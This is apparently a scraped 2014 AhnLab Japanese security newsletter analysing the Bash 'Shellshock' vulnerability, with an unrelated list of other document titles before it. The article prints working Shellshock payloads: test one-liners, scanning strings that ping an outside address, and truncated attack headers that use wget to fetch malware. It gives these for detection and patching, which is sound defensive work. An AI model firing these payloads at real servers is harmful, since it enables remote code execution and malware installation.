セキュリティプレス アン UNIX Linux OS 関連のBash (Born Again Shell) 脆弱性を詳細分析 Bash 脆弱性 シェルショック で全世界が震撼 2014年9月24日 GNU Bash環境変数を使用したコードインジェクションのセキュリティ脆弱性が報告された これは シェ

Similar documents
Vol.71 政府機関を狙う連続ターゲット攻撃の目的は?

目次 1 はじめに AWS が提供するセキュリティモデル 責任共有モデルとセキュリティについて 検討すべきセキュリティ対策のポイント ミドルウェアの脆弱性と公開サーバに対する脅威 ミドルウェアで見つかる深刻な脆弱性..

Vol.62 コインマイナーが狙う仮想通貨 Top4

Vol.04 Partner Step-up Traning Day 2014

延命セキュリティ製品 製品名お客様の想定対象 OS McAfee Embedded Control 特定の業務で利用する物理 PC 仮想 PC や Server 2003 Server 2003 ホワイトリスト型 Trend Micro Safe Lock 特定の業務で利用するスタンドアロン PC

Microsoft IISのWebDAV認証回避の脆弱性に関する検証レポート

CloudEdgeあんしんプラス月次レポート解説書(1_0版) _docx

Symantec Endpoint Protection 12.1 の管理練習問題 例題 1. 管理外検出でネットワーク上のシステムを識別するとき 次のどのプロトコルが使用されますか a. ICMP b. TCP c. ARP a. UDP 2. ある管理者が Symantec Endpoint P

Vol.66 信頼できるマルウェア (?) に隠された真実

OP2

McAfee Application Control ご紹介

2015 年 4 月 15 日に発表された HTTP.sys の脆弱性 ( ) へ の対応について 製品名 : バージョン : 対象プラットフォーム : カテゴリ : iautolaymagic すべてすべて Web アプリ この度 マイクロソフト社製品において緊急度の高い脆弱性 (CV

Sophos Enterprise Console

WannaCry とは WannaCry はランサムウェアの一種 WannaCry は ランサムウェアと呼ばれる身代金要求型のマルウェアです WannaCryptor WanaCrypt Wcry といった呼ばれ方もします 一般的にランサムウェアに感染すると 以下のようなデータを使用できないように暗

マルウェアレポート 2018年1月度版

Agenda 1. 今回のバージョンアップについて a. バージョンアップ概要 b. バージョンアップ目的 c. 新バージョンのシステム要件に関する注意事項 d. 現行バージョンのサポート期間 2. 対応プラットフォームの追加 3. 新機能の追加および機能強化 2

— intra-martで運用する場合のセキュリティの考え方    

JPCERT/CC インターネット定点観測レポート[2014年7月1日~9月30日]

Intel MPI Library Linux

マルウェアレポート 2017年9月度版

製品概要

Vol.63 Kimsuky の帰還 今回のターゲットは?

= SaaS型総合決済サービス = 「PGマルチペイメントサービス」のご案内

SiteLock操作マニュアル

FOCUS IN-DEPTH - URSNIF ANALYSIS アースニフ ステガノグラフィーで金融圏を攻撃 金融情報を奪取するマルウェアのアースニフ (Ursnif) が再び活動を再開した アースニフは金融圏で最も頻繁に発見されるマルウェアの一つであり 初期は北米 ヨーロッパ オーストラリアなど

1. 開発ツールの概要 1.1 OSS の開発ツール本書では OSS( オープンソースソフトウェア ) の開発ツールを使用します 一般に OSS は営利企業ではない特定のグループが開発するソフトウェアで ソースコードが公開されており無償で使用できます OSS は誰でも開発に参加できますが 大規模な

HULFT Series 製品における Javaの脆弱性(CVE )に対する報告

セットアップカード

(Microsoft PowerPoint - janog23-server-ipv6-rel-public.ppt [\214\335\212\267\203\202\201[\203h])

OpenAM 9.5 インストールガイド オープンソース ソリューション テクノロジ ( 株 ) 更新日 : 2013 年 7 月 19 日 リビジョン : 1.8

インテル® Parallel Studio XE 2019 Composer Edition for Fortran Windows : インストール・ガイド

McAfee Embedded Control データシート

安全な Web サイトの作り方 7 版 と Android アプリの脆弱性対策 独立行政法人情報処理推進機構 (IPA) 技術本部セキュリティセンター Copyright 2015 独立行政法人情報処理推進機構

HULFT8 for Windows/UNIX/Linux/zLinux の機能で発生する不具合について

PGRelief C/C++ 強化ポイント説明書

Microsoft PowerPoint - ã…Šã…¬ã…fiㅥㅼ盋_MVISONCloud製åfi†ç´¹ä»‰.pptx

Silk Central Connect 15.5 リリースノート

Gromacsユーザーマニュアル

McAfee Firewall for Linux リリース ノート

Red Hat Enterprise Linuxのcron(8)デーモンにデフォルト定義されたtmpwatch命令の動作による、WebOTXのトラブル対処方法

Shellshock 脆弱性 (CVE ) とは? Linux などで使用されるオープンソースプログラム bash に存在する脆弱性 bash は Linux BSD Mac OS X などの OS で使われる シェル と呼ばれるコマンドシェルの 1 つ 脆弱性が悪用されると ba

WEBシステムのセキュリティ技術

なぜIDSIPSは必要なのか?(v1.1).ppt

不正送金対策 フィッシング対策ソフト PhishWall( フィッシュウォール ) プレミアム のご案内 広島県信用組合では インターネットバンキングを安心してご利用いただくため 不正送金 フィッシング対策ソフト PhishWall( フィッシュウォール ) プレミアム を導入しました 無料でご利用

Slide 1

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

4. 環境要件 WebWrapper および WebWrapper 管理サーバ <Windows 版 > Windows2000Server ( サービスパック 3 また 4 適用済 ), Windows Server 2003 <Solaris 版 > SPARC CPU を搭載する Sun 製ワ

ネットワーク機器の利用における セキュリティ対策 独立行政法人情報処理推進機構技術本部セキュリティセンター大道晶平

もくじ もくじ...2 トレンドマイクロスマートホームネットワークでできること...3 スマートホームネットワーク機能を使う...4 スマートホームネットワーク設定画面...5 設定...8 セキュリティーステータス...10 セキュリティーパトロール...12 WEB サイトフィルター...14

HeartCoreインストールマニュアル

Drive-by Download 攻撃に おけるRIG Exploit Kitの 解析回避手法の調査

ESET Mobile Security V4.1 リリースノート (Build )

Corp ENT 3C PPT Template Title

サーバセキュリティサービスアップグレード手順書 Deep Security 9.6SP1 (Windows) NEC 第 1 版 2017/08/23

Transcription:

2014.10 Vol.10 Bash 脆弱性を詳細分析

セキュリティプレス アン UNIX Linux OS 関連のBash (Born Again Shell) 脆弱性を詳細分析 Bash 脆弱性 シェルショック で全世界が震撼 2014年9月24日 GNU Bash環境変数を使用したコードインジェクションのセキュリティ脆弱性が報告された これは シェルシ ョック ShellShock と呼ばれ セキュリティ専門家らは今年4月に世界を騒がせた ハートブリード Heartbleed よりも深 刻な脅威になりかねないとしている Bashは企業が主に使用しているサーバーOSのUNIXおよびLinuxに関連してコマンドインタプ リタの役割を果たしているため 最悪の場合は全世界のウェブサーバーの半数を麻痺させることもできる 攻撃者は悪意あるコマン ドが含まれた特殊な環境変数を使用し この脆弱性を突いて悪質な行為を実行できる 同脆弱性の影響を受けるGNU Bash環境を使 用するシステム管理者は セキュリティ更新プログラムを迅速に適用して被害を防ぐように推奨している 9月29日 Red Hat U buntu セントOS Novell/SUSEなどの主要Linux利用企業は同バグに対するパッチを発表した 今回は新たに登場したBashコードインジェクションの脆弱性と 影響を受けるバージョンや被害防止のための方法を紹介した GNU Bashの任意の環境変数において コードインジェクション Code Injection 手法を使って特定のコードを挿入し 悪意あるコードを実行で きる脆弱性が発見された Bash Bourne-again shell は Unix Linux およびMac OS X系列のOSに至るまで広範囲に使用されているコマンド シェル shell の一種であり GNUプロジェクトのために作成された 初期のUNIXシェル Bourne shell と 生まれ変わったという意味の Bor n Again の合成語で 一般的に Bash バッシュ という略語で通用する Bashはユーザーが簡単なテキストベースのWindowにコマンドを入 力すると これに応じてOSが作動するようにするコマンドインタプリタの役割を果たしている GNU プロジェクト GNUオペレーティングシステムの計画 GNU project は 1983年9月27日 net.unix-wizardsおよび net.usoft というニュー スグループで発表した その目標は 完全にフリーソフトウェアで構成されるオペレーティングシステムを実現すること だった 立案者のスト ールマンは 1960年代や1970年代のコンピュータユーザーのように ユーザーを自由にしたい と考えていた それは 使っているソフトウェ アのソースコードを使って勉強できる自由であり ソフトウェアを他の人々と共有できる自由であり ソフトウェアを修正できる自由であり 修 正版を配布できる自由である この哲学は1985年3月 GNU宣言として公表された 1990年には拡張性の高いテキストエディタ (Emacs) や 非常に広く使われている最適化コンパイラ (GCC) 一般的UNIXディストリ ビューションの基本ライブラリやユーティリティの大部分が完成した 1991年にはリーナス トーバルズが独自にLinuxカーネルの開発を始め ており 1992年にはLinuxのバージョン0.12がGPLライセンスでリリースされた そしてLinuxとGNUを組み合わせることで 世界初の完 全にフリーソフトウェアで構成されたオペレーティングシステムが完成された *出典 Wikipediaより抜粋 2

セキュリティプレス アン 米国国土安保省傘下のコンピューター緊急対応チーム (US-CERT) は 9 月 24 日 Web にて Bash 脆弱性を警告し 迅速なパッチ適用を勧告した Bash 使用有無およびバージョン確認方法 運用中のサーバーまたはサービスの Bash 使用有無および脆弱性の影響を受ける Bash バージョンの使用有無は 以下のコマンドで確認可能だ $ cat /etc/shells /bin/sh /bin/csh /bin/ksh /usr/local/bin/tcsh /usr/local/bin/bash $ bash version GNU bash, version 3.2.39(1)-release (i386-unknownopenbsd4.3) Copyright (C) 2007 Free Software Foundation, Inc. また 影響を受ける Bash バージョンの詳細情報は US-CERT で提供する以下の Web ページから確認できる < 脆弱な Bash バージョンの参考ページ > -http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-6271 -http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-7169 Bash コードインジェクションの脆弱性 (CVE-2014-6271/ CVE-2014-7169) 図 1 のように 環境変数の関数定義の後に任意の実行コードを追加すると Bash で環境変数をインポートする過程で追加されたコードが一緒に実 行される bash-3.2$ env x='() { :;}; echo vulnerable bash -c echo this is a test vulnerable this is a test 図 1 脆弱性テスト (* 出典 :Red Hat の SECURITY BLOG) 最初はこの脆弱性 (CVE-2014-6271) を補完するパッチが提供されたが ファイル作成を回避するコードが確認されたため これを CVE-2014-71 69 のパッチで対応することになった ( 図 2 参照 ) 3

セキュリティプレス アン 図 2 Bash の脆弱性に関する CVE-2014-6271 および CVE-2014-7169 パッチガイド (* 出典 : US-CERT) 使用中のシステム脆弱性 CVE-2014-7169 の有無は 以下のコマンドを使って簡単にテストが可能だ bash-3.2$ $ cd /tmp; rm -f /tmp/echo; env x=() { (a)=>\ bash -c echo date ; cat /tmp/echo 他にも Bash 脆弱性スキャンツールが公開中だ これらのツールを利用して システム管理者は内部システムを安定的かつ継続的にチェックすること をお勧めする Bash コードインジェクションの脆弱性スキャン 攻撃者は 図 3 のように リモートでコードをテストして脆弱性が含まれた Bash を起動するウェブ CGI 環境を持続的に探索することが分かった # x.x.x.x および y.y.y.y は IP アドレス x.x.x.x/?referer=() { :; }; /bin/ping -c 1 y.y.y.y\x0d 図 3 Bash コードインジェクションの脆弱性対象スキャン過程 4

セキュリティプレス アン そのため 図 4 に示すように通常の Web 環境の /cgi-bin/ ディレクトリ以下の CGI プログラムにアクセスしたり ログから任意のコードインジェク ション行為が見られるか確認する必要がある GET /cgi-bin/bb-histlog.sh GET /cgi-bin/login.cgi GET /cgi-bin/web2cgi/getpass.cgi?lang=gb GET / HTTP/1.1" 200 3900 "() { :; }; /bin/ping -c 1 ip.addr 図 4 ウェブサーバーのログ上のBashコードインジェクションによる脆弱性スキャン行為 特にウェブ環境で 脆弱性を持つ Bash を起動する Web CGI プログラムが確認された場合 攻撃者は検索エンジンからそのプログラムを利用する攻撃対象のウェブサーバーを簡単に確保できてしまう これにより自動化プロセスで 多数の攻撃対象をベースにしたゾンビ ネットワーク構成の可能性も浮上している 実際に 図 5 のように 一般的なコードインジェクション手法に多く利用される連動タイプの攻撃技術が次々報告された 外部 Web サイトから悪質な実行コードをダウンロードする wget 実行コマンドのコードインジェクションにより 外部 Web サイトから DoS 機能を持つ Linux 型マルウェア (V3 診断名 : Linux/CVE-2014-6271) および IRCBot 機能を持つ Perl スクリプト型マルウェア (Perl/ Shellbot) を /tmp スペースに保存 実行する攻撃方法をとっている Cookie: () { :; }; wget. User-Agent: () { :;}; wget.cookie:().{.:;.}; wget.host:().{.:;.}; wget..referer:().{.:;.};.wget 図 5 wget 実行コマンドのコードインジェクション攻撃手法 現在 Bash 脆弱性を利用すれば 攻撃者は Web サーバーのコンテンツおよびコード変更 Web サイト改ざん ユーザーのデータ流出や DDoS 攻撃が実 行可能となる この他にも SSH DHCP プロトコルなどさまざまな環境下で Bash コードインジェクションの脆弱性攻撃のシナリオが提起されている 状況だ Bash コードインジェクションの脆弱性検知件数が持続的に増加アンラボは自社のネットワーク統合セキュリティソリューション TrusGuard( トラスガード ) に同脆弱性に関するシグネチャを適用 モニタリングした結果 図 6 のように Bash コードインジェクションの脆弱性検知件数が最近持続的に増加していることが確認された これはBash コードインジェクションの脆弱性をスキャンするツールの増加と 同脆弱性を悪用する実際の攻撃から起因するものと推測できる 当分はこのような傾向が続くと予想されるだけに セキュリティ担当者の継続的なモニタリングと対応が必要だ 5

セキュリティプレス アン TrusGuardシグネチャ名 bash_code_injection (CVE-2014-6271) シグネチャ 配布当日 1日後 2 日後 3 日後 4 日後 1109 1069 625 1394 4529 1日後 2日後 3日後 4日後 配布当日 図6 TrusGuardのBashコードインジェクション脆弱性の検知件数推移 Bashコードインジェクションの脆弱性に対応する まず使用中のシステム サービスのBash脆弱性の影響有無を把握し 関連するセキュリティ更新プログラムを迅速に適用すること またBashコード インジェクションの脆弱性を悪用する 任意のリモートコード攻撃へのモニタリングを強化し 侵入防止システム IPS を利用して被害を最小化す ることも重要だ この他 脆弱なBashバージョンを使用するウェブCGIプログラムを運営するウェブサーバーの有無を確認し 必要な場合を除きCG Iプログラムサービスを停止したり削除することも必要だ 一方 既存の脆弱性が解決 修正 されたとしても攻撃者は持続的に回避方法を研究するだろう Bash脆弱性に関するパッチを適用後も 当分は同 脆弱性に関して注意深くモニタリングし 新規セキュリティ更新プログラムを常に迅速に適用して最新のセキュリティ状態を維持することが重要だ アンラボは今回のBash脆弱性に関する脅威を継続してモニタリングし 注意を呼びかけることで企業および一般ユーザーの被害を最小化するため最 善を尽くしている <Bash脆弱性に関するセキュリティアドバイザーサイト> アンラボ セキュリティアドバイザー http://www.ahnlab.com/kr/site/securitycenter/asec/asecview.do?groupcode=vni002& webnewsinfounionvo.seq=22903 6

セキュリティプレス アン < 参考サイト > http://hacksum.net/ www.redhat.com Trend Micro Blog http://blog.trendmicro.com/trendlabs-security-intelligence/bashvulnerability-shellshock-exploit-emerges-in-thewild-leads-toflooder/ Red Hat Blog https://securityblog.redhat.com/2014/09/24/bash-speciallycrafted-environment-variables-code-injection-attack/ 7

http://www.ahnlab.co.jp http://global.ahnlab.com http://www.ahnlab.com アンラボとは株式会社アンラボは 業界をリードする情報セキュリティソリューションの開発会社です 1995 年から弊社では情報セキュリティ分野におけるイノベーターとして最先端技術と高品質のサービスをご提供できるように努力を傾けてまいりました 今後もお客様のビジネス継続性をお守りし 安心できるIT 環境づくりに貢献しながらセキュリティ業界の先駆者になれるよう邁進してまいります アンラボはデスクトップおよびサーバー 携帯電話 オンライントランザクション ネットワークアプライアンスなど多岐にわたる総合セキュリティ製品のラインナップを揃えております どの製品も世界トップクラスのセキュリティレベルを誇り グローバル向けコンサルタントサービスを含む包括的なセキュリティサービスをお届け致します 101-002 東京都千代田区外神田 4-14-1 秋葉原 UDX 8 階北 Tel : 03-5209-8610 ( 代 ) 2014 AhnLab, Inc. All rights reserved.